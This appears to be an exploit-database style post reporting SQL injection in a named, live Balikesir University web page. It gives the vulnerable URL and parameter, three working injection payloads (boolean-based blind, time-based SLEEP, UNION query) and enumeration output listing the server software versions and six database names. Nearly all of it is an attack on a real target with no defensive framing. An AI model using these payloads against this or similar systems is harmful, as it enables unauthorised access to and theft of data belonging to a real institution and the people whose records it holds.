# Exploit Title: Balikesir Üniversitesi SQL İnjection
# Date: 22.01.2020
# Exploit Author: Furkan Özer
# Vendor Homepage: http://www.nef.balikesir.edu.tr
Link##: http://www.nef.balikesir.edu.tr/dtsyaz/sorgula_abd_ders_dagilimi.php?abd_no=[] SQL'li
Parameter: abd_no (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: abd_no=-2068 OR 4490=4490
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: abd_no=9 AND (SELECT 3573 FROM (SELECT(SLEEP(5)))XDzC)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: abd_no=-5007 UNION ALL SELECT NULL,CONCAT(0x7178627671,0x667643597a76566c4e444f426b524a56486d6862575547786b6174546e794d6273516254774e6853,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- YYWZ
the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.4.35, PHP 5.6.38, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [6]:
[*] information_schema
[*] nefveri
[*] nefveri_bahar
[*] nefveri_guz
[*] nefveri_yedek
[*] test